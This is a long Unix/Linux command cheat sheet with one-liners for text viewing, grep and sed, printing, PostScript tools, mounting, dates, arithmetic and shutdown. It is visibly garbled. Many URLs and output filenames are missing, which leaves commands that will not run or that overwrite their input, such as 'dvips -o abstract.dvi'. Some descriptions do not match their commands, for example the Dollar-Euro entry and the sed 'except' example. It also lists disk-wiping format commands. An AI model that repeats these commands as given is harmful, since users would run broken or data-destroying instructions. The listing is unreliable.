check in the file 'novel' with RCS

 ci novel

deposit this revision in RCS

 ci novel

check out the latest revision of the file 'novel' for editing,

 co -l novel

check out the current revision of file 'novel', but dont permit any changes

 co novel

check out revision 1.14 of file 'novel'

 co -l -r1.14 novel check-in the latest changes first

view the revision log for file 'novel'

 rlog novel

Reading Text Files ‹↑›

page through the text file 'README'

 less README

page through all of the Unix FAQ files in '/usr/doc/FAQ'

 less /usr/doc/FAQ/unix-faq-part*
This command starts less, opens in it all of the files that match the given pattern '/usr/doc/FAQ/unix-faq-part*', and begins displaying the

peruse the file 'translation' with non-printing characters displayed

 cat -v translation | less  non-printing characters are shown with 'hats'

output the first ten lines of file 'placement-list'

 head placement-list

output the first line of file 'placement-list'

 head -1 placement-list

output the first sixty-six lines of file 'placement-list'

 head -66 placement-list

output the first character in the file 'placement-list'

 head -c1 placement-list

output the last ten lines of file 'placement-list'

 tail placement-list

output the last fourteen lines of file 'placement-list'

 tail -14 placement-list

follow the end of the file 'access_log'

 tail -f access_log

output line 47 of file 'placement-list'

 sed '47!d' placement-list

output lines 47 to 108 of file 'placement-list'

 sed '47,108!d' placement-list

output the tenth line in the file 'placement-list'

 head placement-list | tail -1

output the fifth and fourth lines from the bottom of file 'placement-list'

 tail -5 placement-list | head -2

output the 500th character in 'placement-list'

 head -c500 placement-list | tail -c1

output the first character on the fifth line of the file 'placement-list'

 head -5 placement-list | tail -1 | head -c1

output all the text from file 'book-draft' between `Chapter 3' and 'Chapter 4'

 sed -n '/Chapter 3/,/Chapter 4/p' book-draft

output all the text from file 'book-draft', except that which lies between the text 'Chapter 3' and `Chapter 4'

 sed '/Chapter 3/,/Chapter 4/p' book-draft

apply the kraut filter to the text in the file '/etc/motd'

 cat /etc/motd | kraut

view the contents of the text file 'alice-springs' in sview

 sview alice-springs

view an ASCII character set

 man ascii

view the ISO 8859-1 character set

 man iso_8859_1

run the vi tutorial, type the following from your home directory:

 cp /usr/doc/nvi/vi.beginner.gz .
 gunzip vi.beginner

concatenate these files into a new file, 'novels'

 cat early later > novels

make a file, 'novels', with some text in it cat > novels This Side of Paradise The Beautiful and Damned ,,,

add a line of text to the bottom of file 'novels'

 cat >> novels
The Last Tycoon C-d

insert several lines of text at the beginning of the file 'novels'

 ins novels
The Novels of F. Scott Fitzgerald

process the file and write to the file 'monday.txt'

 m4 menu > monday.txt
Debian: 'an'

output all anagrams of the word 'lake'

 an lake

output all anagrams of the phrase 'lakes and oceans'

 an 'lakes and oceans'

output only anagrams of the phrase 'lakes and oceans' which contain the string 'seas'

 an -c seas 'lakes and oceans'

output all of the words that can be made from the letters of the word 'seas'

 an -w seas

output all of the palindromes in the system dictionary

 perl -lne 'print if $_ eq reverse' /usr/dict/words

make a cut-up from a file called 'nova'

 cutup nova

Debian: 'dadadodo'

output random text based on the text in the file 'nova'

 dadadodo nova

output all non-empty lines from the file 'term-paper'

 grep . term-paper

output only the lines from the file 'term-paper' that contain more than just space characters

 grep '[^ ].' term-paper

output only the odd lines from file 'term-paper'

 sed 'n;d' term-paper

double-space the file 'term-paper' and and save to 'term-paper.print'

 pr -d -t term-paper > term-paper.print

triple-space the file 'term-paper' and save to the file 'term-paper.print'

 sed 'G;G' term-paper > term-paper.print

quadruple-space the file 'term-paper', and save to the file 'term-paper.print'

 sed 'G;G;G' term-paper > term-paper.print

output the file 'owners-manual' with a five-space (or five-column) margin to a new file, ''

 pr -t -o 5 -w 77 owners-manual >
This command is almost always used for printing, so the output is

print the file 'owners-manual' with a 5-column margin and 80 columns of text

 pr -t -o 5 -w 85 owners-manual | lpr

print the file 'owners-manual' with a 5-column margin and 75 columns of text

 pr -t -o 5 -w 80 owners-manual | lpr

convert all tab characters to spaces in 'list', and write the output to 'list2'

 expand list > list2

convert initial tab characters to spaces in 'list', and write the output to the standard output

 expand -i list

convert every 8 leading space characters to tabs in 'list2', saving in 'list'

 unexpand list2 > list

convert all occurrences of eight space characters to tabs in file 'list2', and write the output to the standard output

 unexpand -a list2

convert every leading space character to a tab character in 'list2', and write the output to the standard output

 unexpand -t 1 list2

paginate the file 'listings' and write the output to a file called ''

 pr -f -h "" listings >
By default, pr outputs pages of 66 lines each. You can specify the page

paginate the file 'listings' with 43-line pages, and write the output to a file called ''

 pr -f -h "" -l 43 listings >
NOTE: If a page has more lines than a printer can fit on a physical

print the file 'duchess' with the default pr preparation

 pr duchess | lpr

You can also use pr to put text in columns -- give the number of

print the file 'news.update' in four columns with no headers or footers

 pr -4 -t news.update | lpr

replace plaintext-style italics with TeX '\it' commands M-x replace-regular-expression _\([^_]+\)_ \{\\it \1} replace TeX-style italics with plaintext _underscores_ M-x replace-regular-expression \{\\it \{\([^\}]+\)\} _\1_

output the file 'term-paper' so that you can view underbars, type:

 ul term-paper

output the file 'term-paper' with all backspace characters stripped out

 col -u term-paper

sort the file 'provinces' and output all lines in ascending order

 sort provinces

sort the file 'provinces' and output all lines in descending order

 sort -r provinces

peruse the file 'report' with each line of the file preceded by line numbers

 nl report | less set the numbering style with the '-b'

show 'report', each line preceded by line numbers, starting with 2 step 4

 nl -v 2 -i 4 report

peruse the text file 'report' with each line of the file numbered

 cat -n report | less

peruse the text file 'report' with each non-blank line of the file numbered

 cat -b report | less

write a line-numbered version of file 'report' to file 'report.lines'

 cat -n report > report.lines

output the file 'prizes' in line-for-line reverse order

 tac prizes

output 'prizes' in page-for-page reverse order

 tac -s $'\f' prizes  using the form-feed as the delimiter

output 'prizes' in word-for-word reverse order

 tac -r -s '[^a-zA-z0-9\-]' prizes

output 'prizes' in character-for-character reverse order

 tac -r -s '.\|
  ' prizes

output 'prizes' with the characters on each line reversed

 rev prizes

output lines in the file 'catalog' containing the word `CD', type:

 grep CD catalog

output lines in the file 'catalog' containing the word `Compact Disc'

 grep 'Compact Disc' catalog

output lines in all files in the current directory containing the word 'CD'

 grep CD *

output lines in the file 'catalog' that contain a `$' character, type:

 grep '\$' catalog

output lines in the file 'catalog' that contain the string '$1.99'

 grep '\$1\.99' catalog

output all lines in '/usr/dict/words' beginning with `pre', type:

 grep '^pre' /usr/dict/words

output all lines in the file 'book' that begin with the text `in the beginning', regardless of case

 grep -i '^in the beginning' book

output lines in the file 'sayings' ending with an exclamation point

 grep '!$' sayings

output all lines in '/usr/dict/words' that are exactly two characters wide

 grep '^..$' /usr/dict/words

output all lines in '/usr/dict/words' that are 17 characters wide

 grep '^.\{17\}$' /usr/dict/words

output all lines in '/usr/dict/words' that are 25 or more characters wide

 grep '^.\{25,\}$' /usr/dict/words

output all lines in 'playlist' containing either 'the sea' or 'cake'

 grep 'the sea\|cake' playlist

output all lines in '/usr/dict/words' that are not three characters wide

 grep -v '^...$'

output all lines in 'access_log' that do not contain the string 'http'

 grep -v http access_log

output lines in '/usr/dict/words' that only contain vowels, type:

 grep -i '^[aeiou]*$' /usr/dict/words

search across line breaks for the string 'at the same time as' in the file 'notes'

 cat notes | tr -d '\r\n:\>\|-' | fmt -u | grep 'at the same time as'

list lines from the file 'email-archive' that contain the word 'narrative' only when it is quoted

 grep '^>' email-archive | grep narrative

list lines of 'archive' containing the word 'narrative', but notquoted

 grep narrative archive | grep -v '^>'

show lines in '/usr/dict/words' containing any of the words in the file 'swear'

 grep -f swear /usr/dict/words

output lines in '/usr/dict/words' not containing any of the words in 'swear'

 grep -v -i -f swear /usr/dict/words

search through the compressed file 'README.gz' for the text 'Linux'

 zgrep Linux README.gz

search the contents of the URL for lines containing the text 'gonzo' or `hunter'

 lynx -dump | grep 'gonzo\|hunter'

search '/usr/dict/words' for lines matching `tsch' and output two lines of context before and after each line of output

 grep -C tsch /usr/dict/words

search '/usr/dict/words' for lines matching `tsch' and output six lines of context before and after each line of output

 grep -6 tsch /usr/dict/words

search '/usr/dict/words' for lines matching `tsch' and output two lines of context before each line of output

 grep -B tsch /usr/dict/words

search '/usr/dict/words' for lines matching `tsch' and output six lines of context after each line of output

 grep -A6 tsch /usr/dict/words

search '/usr/dict/words' for lines matching `tsch' and output ten lines of context before and three lines of context after each line of output

 grep -B10 -A3 tsch /usr/dict/words

replace the string 'helpless' with the string `helpful' in all files in the current directory

 perl -pi -e "s/helpless/helpful/g;" *

search forward through the text you are perusing for the word 'cat' /cat

convert the text file 'saved-mail' to PostScript, with default formatting, and spool the output right to the printer

 enscript saved-mail

write the text file 'saved-mail' to a PostScript file, '', and then preview it in X

 enscript -p saved-mail

print the contents of the text file 'saved-mail' on a PostScript printer, with text set in the Helvetica font at 12 points

 enscript -B -f "Helvetica12" saved-mail

make a PostScript file called '' containing the contents of the text file 'saved-mail', with text set in the Helvetica font at 12 points

 enscript -B -f "Helvetica12" -p saved-mail

print the contents of the text file 'saved-mail' to a PostScript printer, with text set in 10-point Times Roman and header text set in 18-point Times Bold

 enscript -f "Times-Roman10" -F "Times-Bold18" saved-mail

make a PostScript file called '' containing the contents of the text file 'saved-mail', with text and headers both set in 16-point Palatino Roman

 enscript -f "Palatino-Roman16" -F "Palatino-Roman16" -p

print a sign in 72-point Helvetica Bold type to a PostScript printer

 enscript -B -f "Helvetica-Bold72"

print a sign in 63-point Helvetica Bold across the long side of the page

 enscript -B -r --word-wrap -f "Helvetica-Bold63"

pretty-print the HTML file 'index.html'

 enscript -Ehtml index.html

pretty-print an email message saved to the file 'important-mail', and output it with no headers to a file named ''

 enscript -B -Email -p important-mail

peruse a list of currently supported languages

 enscript --help-pretty-print | less

print the contents of the text file 'saved-mail' with fancy headers on a PostScript printer

 enscript -G saved-mail

make a PostScript file called '' containing the contents of the text file 'saved-mail', with fancy headers

 enscript -G -p saved-mail

print the contents of the text file 'saved-mail' with a custom header label containing the current page number

 enscript -b "Page $% of the saved email archive" saved-mail

determine whether the file 'gentle.tex' is a TeX or LaTeX file, type:

 grep '\\document' gentle.tex

print a copy of the PostScript version of the SGML-Tools guide to the default printer

 zcat /usr/doc/sgml-tools/ | lpr

check the SGML file 'myfile.sgml'

 sgmlcheck myfile.sgml

make a plain text file from 'myfile.sgml'

 sgml2txt myfile.sgml

make a PostScript file from 'myfile.sgml'

 sgml2latex myfile.sgml
 latex myfile.latex
 dvips -t letter -o myfile.dvi

list all the X fonts on the system


list all the X fonts on the system whose name contains the text 'rea'

 xlsfonts '*rea*'

list all the bold X fonts on the system

 xlsfonts '*bold*'

display the characters in a medium Courier X font

 xfd -fn '-*-courier-medium-r-normal--*-100-*-*-*-*-iso8859-1'

set the console font to the scrawl_w font

 consolechars -f scrawl_w

set the console font to the 8x8 size sc font

 consolechars -H 8 -f sc

list all of the characters in the current console font


output the text 'news alert' in the default figlet font

 figlet news alert

output the text of the file 'poster' in the figlet `bubble' font

 cat poster | figlet -f bubble
NOTE: The 'bubble' font is installed at `/usr/lib/figlet/bubble.flf'.

make a banner saying 'Happy Birthday Susan'

 banner 'Happy Birthday Susan'

preview the file '/usr/doc/gs/examples/'

 ghostview /usr/doc/gs/examples/
extract only the first page from the file 'abstract.dvi' and send the PostScript output to the printer
 dvips -pp1 abstract.dvi

By default, dvips will output to the printer; to save the PostScript

output as PostScript the pages 137 to 146 of the file 'abstract.dvi' to the file `'

 dvips -pp137-146 -o abstract.dvi

select the first ten pages, page 104, pages 23 through 28, and page 2 from the file '' and write it to the file ''

 psselect -p1-10,104,23-28,2

write the 2nd-to-last to the tenth pages from the PostScript file '' and output them to the file ''

 psselect -p_2-10

write all even pages in '' to a new file, ''

 psselect -e

select all of the odd pages in the file '' and write them to a new file, ''

 psselect -o
Use an underscore ('_') alone to insert a blank page, and use `-r' to

select the last ten pages of file '', followed by a blank page, followed by the first ten pages, and output them to a new file, ''

 psselect -p_1-_10,_,1-10
select the pages 59, 79, and 99 in the file '', and output them in reverse order (with the 99th page first) to a new file, ''
 psselect -p59,79,99 -r

make a new PostScript file, '', putting two pages from the file '' on each page

 psnup -2
To specify the paper size, give the name of a standard paper size as an

rearrange the pages of file '' into a signature and write it to the file ''

By default, psbook uses one signature for the entire file. If the file

rearrange the pages of file '' into an eight-sided signature and write it to ''

 psbook -s8

resize the file '' to US letter-sized paper, saving to ''

 psresize -pletter

merge the files '', '', and '' into a postscript file, ''


make a booklet from the file '':


make a double-sized booklet on letter-sized paper in landscape orientation, from a file using letter-sized portrait orientation, type:

 psbook >

make a text file, 'sutra.txt', from the input file `', type:

 ps2ascii sutra.txt

see how much free space is left on the system's disks


output the disk usage for the folder tree whose root is the current directory


output the disk usage, in kilobytes, of the '/usr/local' directory tree

 du -k /usr/local

show the number of megabytes used by the file '/tmp/cache'

 du -m /tmp/cache

output only the total disk usage of the '/usr/local' directory tree

 du -s /usr/local

output only the total disk usage, in kilobytes, of the '/usr/local' folder tree

 du -s -k /usr/local

format a floppy disk in the first removable floppy drive

 mke2fs /dev/fd0

Mounting And Unmounting Media ‹↑›

In order for a some piece of media to be used in Linux it normally needs to be 'mounted' or 'unmounted'

mount a floppy

 mount /floppy

mount the floppy in the first floppy drive to '~/tmp'

 mount /dev/fd0 ~/tmp

Once you have mounted a floppy, its contents appear in the directory you specify, and you can use any file command on them.

list the contents of the base directory of the floppy mounted on '/floppy'

 ls /floppy

list the contents of the whole folder tree on the floppy mounted on '/floppy'

 ls -lR /floppy

umount the usb stick that is mounted on '/floppy'

 umount /floppy

You cant unmount the drive if you are in the mounted folder

mount a CD-ROM on the system

 mount /cdrom   the contents are then available at '/cdrom/'

mount the disc in the CD-ROM drive to the '/usr/local/share/clipart' directory

 mount /dev/cdrom /usr/local/share/clipart

peruse a directory tree graph of the CD-ROM's contents

 tree /usr/local/share/clipart | less

change to the root directory of the CD-ROM

 cd /usr/local/share/clipart

list the contents of the root directory of the CD-ROM

 ls /usr/local/share/clipart

unmount the disc in the CD-ROM drive mounted on '/cdrom'

 umount /cdrom   if files are in use, it may be impossible to unmount

Printing ‹↑›

print the file 'invoice'

 lpr invoice

type a message with banner and send it to the printer

 banner "Bon voyage!" | lpr

print a verbose, recursive listing of the '/usr/doc/HOWTO' directory

 ls -lR /usr/doc/HOWTO | lpr

send the file 'nightly-report' to the printer called bossomatic, type:

 lpr -P bossomatic nightly-report

print a dozen copies of the file 'nightly-report'

 lpr -#12 nightly-report

Printing Queues ‹↑›

view the spool queue for the default printer


view the spool queue for the printer called bossomatic

 lpq -P bossomatic

list the print jobs for user harpo

 lpq harpo

Canceling Print Jobs ‹↑›

cancel print job 83

 lprm 83

cancel all of your print jobs, but already spooled pages still print

 lprm -

print the current buffer with page numbers and headers

  M-x print-buffer

print the current buffer with no additional print formatting done to the text

 M-x lpr-buffer

print a PostScript image of the current buffer

 M-x ps-print-buffer

print the DVI file 'list.dvi'

 dvips list.dvi

print 'home.dvi' on an envelope loaded in the manual feed tray of the printer

 dvips -m -t landscape home.dvi

list the available printer formats

 gs -?

GNU Ghostscript 5.10 (1998-12-17)

convert '' to a format suitable for printing on an HP Color DeskJet 500 printer

 gs -sDEVICE=cdj500 -dSAFER -dNOPAUSE < /dev/null

convert the file 'abstract.dvi' to PostScript

 dvips -o abstract.dvi

this command reads the dvi file 'abstract.dvi' and writes a postscript version of it to the file ''; the original file is not

output only pages 14 and 36 from file 'abstract.dvi' to a PostScript file, ''

 dvips -pp14,36 -o abstract.dvi

output pages 2 - 100 from 'abstract.dvi' to a postscript file, ''

 dvips -pp2-100 -o abstract.dvi

output page 1 and pages 5 to 20 from file 'abstract.dvi' to a PostScript file, ''

 dvips -pp1,5-20 -o abstract.dvi

output 'abstract.dvi' as a PostScript file, '', with a paper size of `legal'

 dvips -t legal -o abstract.dvi

print the file 'abstract.dvi' to the default printer in landscape mode

 dvips -t landscape abstract.dvi

generate a pdf file from the dvi file 'abstract.dvi'

 dvips -Ppdf -o abstract.pdf abstract.dvi

This command writes a new file, 'abstract.pdf', in PDF format.

convert the PDF file 'pricelist.pdf'

 pdf2ps pricelist.pdf

output the man page for psbook as PostScript and send it to the default printer

 man -t psbook | lpr

output the man page for psbook to the file ''

 man -t psbook >

In the preceding example, you can then use gs to convert the file to a format your non-PostScript printer understands.

get a directory listing of the DOS disk currently in the primary floppy drive

 mdir a:

introduce the floppy disk in the first floppy drive as an HFS volume for the 'hfsutils'

 hmount /dev/fd0
After you run this command, the other tools in the hfsutils package

get a directory listing of the currently specified Macintosh disk

Give the name of a directory as a quoted argument.

get a directory listing of the 'Desktop Folder' directory in the currently specified Macintosh disk

 hls 'Desktop Folder'

copy the file 'readme.txt' to the `Desktop Folder' directory in the current Mac disk

 hcopy readme.txt 'Desktop Folder'

copy the file 'Desktop Folder:Readme' from the current Mac disk to the current directory

 hcopy 'Desktop Folder:Readme' .

delete the file 'Desktop Folder:Readme' on the current Mac disk, type:

 hdel 'Desktop Folder:Readme'

format the disk in the first floppy drive with a Macintosh HFS filesystem

 hformat /dev/fd0

format the disk in the second floppy drive with a Mac HFS filesystem, giving it a volume label of 'Work Disk'

 hformat -l 'Work Disk' /dev/fd1

format the second partition of the SCSI disk at '/dev/sd2' with a Mac HFS filesystem

 hformat /dev/sd2 2

format the entire SCSI disk at '/dev/sd2' with a Mac HFS filesystem, overwriting any existing Mac filesystem and giving it a label of 'Joe's Work Disk'

 hformat -f -l "Joe's Work Disk" /dev/sd2 0  Dangerous!!

Times And Dates ‹↑›

Convert UNIX time to human readable date

 awk 'BEGIN{print strftime("%c",1238387636)}'

show a calender in english

 LC_TIME=c cal -y

When was your OS installed?

 ls -lct /etc | tail -1 | awk '{print $6, $7}'

add the current time to your bash shell prompt

 export PS1="${PS1%\\\$*}"' \t \$ '

Binary Clock

 watch -n 1 'echo "obase=2;`date +%s`" | bc'

output the numeric day of the year that 21 June falls on in the current year

 date -d '21 Jun' +%j   may print '172' for example

hear the current system time


remind yourself to leave at 8:05 p.m.

 leave 2005

ring the bell in five seconds

 sleep 5; echo -e '\a'

announce the time in exactly five minutes

 sleep 5m; saytime &

announce the time in thirty seconds

 sleep 30; saytime

Display The Current Time And Date ‹↑›

print todays time and date in the format '12:32am 23 July 2009'

 date "+%l:%M%p %d %B %Y"

display todays date in the format '3mar2009'

 date "+%d%b%Y"

find out what format specifiers you can use with the 'date' command

 man strftime

?? perl one-liner to get the current week number

 date +%V

output the current date and time in RFC822 format

 date -R   prints 'Fri, 11 May 2001 11:10:29 -0400' for example

output the current system date and time in a standard format


This prints something like 'Fri May 11 11:10:29 EST 2001' where 'EST' signifies the timezone (in this case 'Eastern Standard Time')

output the current date and time in UTC format

 date -u   prints 'Fri May 11 15:10:29 UTC 2001'

Display a cool clock on your terminal

 watch -t -n1 "date +%T|figlet"

Using Date Time Stamps ‹↑›

backup the file 'eg.txt' to 'eg.txt.13may2010' (using the current date)

 cp eg.txt{,.$(date "+%d%b%Y")}

backup the file 'eg.txt' with a readable format date-time stamped file

 cp eg.txt{,.$(date "+%d%b%Y.%I-%M%p")}

This will back up the file 'eg.txt' to 'eg.txt.13may2010.10-45am' for example where the filename used represents the current date and time.

a function to back up a file with a date-time stamp name

 bak(){ [ -z "$1" ] || cp $1{,.$(date "+%d%b%Y.%I-%M%p")}; }

Setting The System Date And Time ‹↑›

There are a number of ways to set the date and time on the computer. One way is to set the time just locally. Another way is to use a network time server to set the time, which should be more accurate in the long run

advance the clock by 3 minutes

 date -s '+3 mins'

set the hardware clock


set the system date

 rdate -s

use a network time server to set the date

 man ntp

Converting Time And Date Formats ‹↑›

Date and times come in many different text formats, depending on the country and whim of the date-time writer. This is very thorny issue, but often must be dealt with. The problem is confounded by cultural differences and ways of measuring time.

Unix-type operating systems such as Linux and Mac OSX have traditionally used the number of milliseconds since 1970 as a universal date-time format, but this has obvious limitations.

Unix time to local time

 date -R -d @1234567890

Converting Date And Time Timezones ‹↑›

If you need to know the equivalent date and time in a different timezone, then you will have to do a conversion.

Foreign And Non Local Times And Dates ‹↑›

show what time and date it is in new york

 TZ=America/New_York date

print the time and date in the 'Indian/Maldives' timezone

 TZ=Indian/Maldives date

show what time and date it is in bogota, colombia

 TZ=America/Bogota date

show what general time zones are available

 ls /usr/share/zoneinfo/ | less

show all available specific time-zones

 f=/usr/share/zoneinfo; find $f | sed "s,$f,," | less

a function which searches for a particular time-zone by name

 tiz(){ f=/usr/share/zoneinfo; find $f | sed "s,$f,," | grep -i "$1"; }; tiz perth

show all the specific time-zones for the Australian zone

 ls /usr/share/zoneinfo/Australia

get time in other timezones

 let utime=$offsetutc*3600+$(date --utc +%s)+3600; date --utc --date=@${utime}

show the date in the german language

 LC_TIME=de_DE.utf8 date

Timezones ‹↑›

show the time in various timezones


show the time in other timezones


Greenwich Mean Time ‹↑›

print greenwich mean time in the format 'Fri Jul 17 16:36:24 2009'

 perl -e "print scalar(gmtime(1247848584))"

Date And Time Offsets ‹↑›

An date offset is something like '2 days ago' or 'tomorrow'.

retrieve GMT time from websites ( generally accruate )

 w3m -dump_head | awk '/Date+/{print $6, $7}'

Get the time from NIST.GOV

 cat </dev/tcp/

print the date 14 days ago.

 date --date="1 fortnight ago"
 date -d "1 fortnight ago"     the same

print date 24 hours ago

 date --date=yesterday

Get yesterday's date or a previous time

 date -d '1 day ago'; date -d '11 hour ago'; date -d '2 hour ago - 3 minute'; date -d '16 hour'

Unix Time ‹↑›

Unix time is a number which represent the number of seconds since 1970-01-01 00:00:00 UTC

Easily decode unix-time (function)

 utime(){ perl -e "print localtime($1).\"\n\"";}

show the number of seconds since 1970

 date +%s

Unix alias for date command that lets you create timestamps

 alias timestamp='date "+%Y%m%dT%H%M%S"'

Convert To Unix Time ‹↑›

It can be useful to convert to unix-time when arithmetic needs to be performed on dates or times, or when dates need to be sorted. The 'date' command does a very good job of parsing diverse date strings (such as feb 7 2009 or 01/11/2001) with its '-d' option, but it has its limitations

convert a date string to the number of seconds since 1970

 date -d "Sat Feb 7 00:37:06 EST 2009" +%s

convert tomorrows date (midnight, I suppose) into unix-time

 date -d'tomorrow' +%s  prints something like '1264168894'

print the final unix date

 date -ud @$[2**31-1]

convert the date 'february 7, 2009' into unix-time

 date -d "Sat Feb 7 00:00:00 EST 2009" +%s
 date -d "feb 7 2009" +%s
 date -d "7 feb 2009" +%s       the same
 date -d "february 7 2009" +%s  the same
 date -d "7/2/2009" +%s         the same, expects mm/dd/yyyy
 date -d "7/2/09" +%s           the same

these formats do NOT work (gnu date version 7.4)

 date -d "feb/7/2009" +%s       NO!! doesnt work, at least for me
 date -d "7/feb/2009" +%s       Nor does this work!
 date -d "feb 2009" +%s         Nor does this work!

convert the date 'Dec 11 01:25:00 2008' to a unix time value

 perl -e 'use Time::Local; print timelocal(0,25,1,11,11,2008), "\n";'
should print '1228919100'

Convert From Unix Time ‹↑›

convert unix time (seconds since 1970) to something human readable

 date -d @1234567890

convert unix-time (seconds since 1970) to something more human-readable

 perl -e 'print scalar(gmtime(1234567890)), "\n"'

convert unix-time to human-readable with awk

 echo 1234567890 | awk '{ print strftime("%c", $0); }'

Calendars ‹↑›

output a calendar for the current month


output a calendar for the year 2001

 cal 2001

output a calendar for the current year

 cal -y

output a calendar for June 1991

 cal 06 1991

Printing multiple years with Unix cal command

 for y in $(seq 2009 2011); do cal $y; done

Show this month's calendar, with today's date highlighted

 cal | grep --before-context 6 --after-context 6 --color -e " $(date +%e)" -e "^$(date +%e)"

Show the date of easter

 ncal -e

Display holidays in UK/England for 2009 (with week numbers)

 gcal -K -q GB_EN 2009

Clocks ‹↑›

Display clock in terminal

 watch -n 1 :

StopWatch, simple text, hh:mm:ss using Unix Time

 export I=$(date +%s); watch -t -n 1 'T=$(date +%s);E=$(($T-$I));hours=$((E / 3600)) ; seconds=$((E % 3600)) ; minutes=$((seconds / 60)) ; seconds=$((seconds % 60)) ; echo $(printf "%02d:%02d:%02d" $hours $minutes $seconds)'

Arithmetic And Numbers ‹↑›


 printf "%d\n" \0x64

floating point operations in shell scripts

 echo "5 k 3 5 / p" | dc

formatting number with comma

 printf "%'d\n" 1234567

output the result of 50 times 10

 calc 50*10    prints '500'

output the result of 100 times the sum of 4 plus 420

 calc '100*(4+420)'  prints '42400'

output the remainder of 10 divided by 3

 calc 10%3           prints '1'

use bc to compute the result of 10 divided by 3, using 20 digits after the decimal point


Count to 65535 in binary (for no apparent reason)

 a=`printf "%*s" 16`;b=${a//?/{0..1\}}; echo `eval "echo $b"`

Bc The Binary Calculator ‹↑›

start the bc binary calculator in interactive mode


assign values to variables in bc and print the sum of 2 variables

 a=4; b=7; a+b  prints '11' on a new line

raise 4 to the power of 3 and multiply the result by 10

 4^3; .*10    you can use the '.' to access the last result

set the number of decimal places shown to 4 and compute 112 divided by 111

 scale=4; 112/111;  this prints '1.0090' on a new line

set the number of decimal places show to 10


multiply the variable 'a' by 4


Floating point power p of x

 bc -l <<< "x=2; p=0.5; e(l(x)*p)"

Random Numbers ‹↑›

see: jot

lotto generator

 shuf -i 1-49 | head -n6 | sort -n| xargs

Outputs a 10-digit random number

 echo $RANDOM$RANDOM$RANDOM |cut -c3-12

Outputs a 10-digit random number

 head -c10 <(echo $RANDOM$RANDOM$RANDOM)

Outputs a 10-digit random number

 head -c4 /dev/urandom | od -N4 -tu4 | sed -ne '1s/.* //p'

Display rows and columns of random numbers with awk

 seq 6 | awk '{for(x=1; x<=5; x++) {printf ("%f ", rand())}; printf ("\n")}'

Print a random 8 digit number

 jot -r -n 8 0 9 | rs -g 0

Print a random 8 digit number

 jot -s '' -r -n 8 0 9

Random number generation within a range N, here N=10

 echo $(( $RANDOM % 10 + 1 ))

output a random number from 0 to 9

 random 10

Outputs a 10-digit random number

 tr -c -d 0-9 < /dev/urandom | head -c 10

Printable random characters

 tr -dc '[:print:]' < /dev/urandom

a random number guessing game

 A=1;B=100;X=0;C=0;N=$[$RANDOM%$B+1];until [ $X -eq $N ];do read -p "N between $A and $B. Guess? " X;C=$(($C+1));A=$(($X<$N?$X:$A));B=$(($X>$N?$X:$B));done;echo "Took you $C tries, Einstein";

sort the lines of a file in a random way

 cat test.txt | while read f ; do printf "$RANDOM\t%s\n" "$f"; done | sort -n | cut -f2-

print a random number with printf

 printf "$RANDOM %s\n" number

Sequences ‹↑›

output the sequence of numbers from one to seven

 seq 7

output the sequence of numbers from one to negative seven

 seq -7

output the sequence of numbers from nine to zero

 seq 9 0

output the sequence of numbers from negative one to negative twenty

 seq -1 -20

output the sequence of numbers from -1 to 14, incrementing by 3,

 seq -1 3 14

output from 9 to 999, stepping by 23, with numbers padded with zeros

 seq -w 9 23 999   all numbers will have an equal 'width'

output the sequence of numbers from 1 to 23, with a space character between each

 seq -s ' ' 1 23

concatenate all the files in this folder, whose names are numbers 25 to 75, into a new file called 'selected-mail'

 cat $(seq -s " " 25 75) > selected-mail

output the prime factors of 2000

 factor 2000  prints '2000: 2 2 2 2 5 5 5'

output the number of ounces in 50 grams

 units '50 grams' 'ounces'
1.7636981 / 0.56699046 ,,,

determine the location of the units database

 units -V
units version 1.55 with readline, units database in /usr/share/misc/units.dat

output the English text equivalent of 100,000

 number 100000

Mathematics ‹↑›

Find out how to say the first 66 digits of pi as a word

 pi 66 | number

Fibonacci numbers with awk

 awk 'BEGIN {a=1;b=1;for(i=0;i<'${NUM}';i++){print a;c=a+b;a=b;b=c}}'

Fibonacci numbers with sh

 prev=0;next=1;echo $prev;while(true);do echo $next;sum=$(($prev+$next));prev=$next;next=$sum;sleep 1;done

A handy mathematical calculator


Draw a Sierpinski triangle

 perl -e 'print "P1\n256 256\n", map {$_&($_>>8)?1:0} (0..0xffff)' | display

Weather ‹↑›

get Hong Kong weather infomation from HK Observatory

 wget -q -O - '' | sed -r 's/<[^>]+>//g;/^UV/q' | grep -v '^$'

check the weather

 ZIP=48104; curl$ZIP 2>/dev/null|grep -A1 'div class="large"'|tr '\n' ' '|sed 's/^.*"large" >\(..\)/\1/;s/&d.* <br \/>/ - /;s/<br \/>//;s/<\/div.*$//'

Show current weather for any US city or zipcode

 weather() { lynx -dump "$*" | sed 's/^ *//;/ror has occ/q;2h;/__/!{x;s/\n.*//;x;H;d};x;s/\n/ -- /;q';}

Money ‹↑›

Get Dollar-Euro exchage rate

 svn log -v -r{2009-05-21}:HEAD | awk '/^r[0-9]+ / {user=$3} /yms_web/ {if (user=="george") {print $2}}' | sort | uniq
.more output messages...

Science ‹↑›

Mirror the NASA Astronomy Picture of the Day Archive

 wget -t inf -k -r -l 3 -p -m

View the latest astronomy picture of the day from NASA.

 apod(){ local x=;feh $x$(curl -s ${x}astropix.html|grep -Pom1 'image/\d+/.*\.\w+');}

Real time satellite weather wallpaper

 curl | xli -onroot -fill stdin

Geography ‹↑›

find geographical location of an ip address

 lynx -dump$1|grep address|egrep 'city|state|country'|awk '{print $3,$4,$5,$6,$7,$8}'|sed 's\ip address flag \\'|sed 's\My\\'

find geographical location of an ip address

 lynx -dump$1|sed -nr s/'^.*My IP address city: (.+)$/\1/p'

geoip lookup, the geographical location of an ip address

 geoip(){curl -s "${1}" | sed '/^IP:/!d;s/<[^>][^>]*>//g' ;}

Gps Global Positioning System ‹↑›

send a .loc file to a garmin gps over usb

 gpsbabel -D 0 -i geo -f "/path/to/.loc" -o garmin -F usb:

Shutting Down The Computer ‹↑›

immediately shut down and halt the system

 shutdown -h now

immediately shutdown the system, and then reboot

 shutdown -r now

immediately shut down and halt the system, sending a warning to all users

 shutdown -h now "The system is being shut down now!"

shut down and then reboot the system at 4:23 a.m.

 shutdown -r 4:23

shut down and halt the system at 8:00 p.m.

 shutdown -h 20:00

shut down and halt the system in five minutes

 shutdown -h +5

shut down and halt the system at midnight, and warn all logged-in users

 shutdown -h 00:00 "The system is going down for maintenance at midnight"

cancel any pending shutdown

 shutdown -c

cancel any pending shutdown and send a message to all logged in users

 shutdown -c "Sorry, I hit the wrong key!"

find out where perl is installed on your system

 which perl

create a new user with a username of bucky

 adduser bucky By default, the user's home directory will be their name

add the user doug to the audio group

 addgroup doug audio

find out how long the system has been up

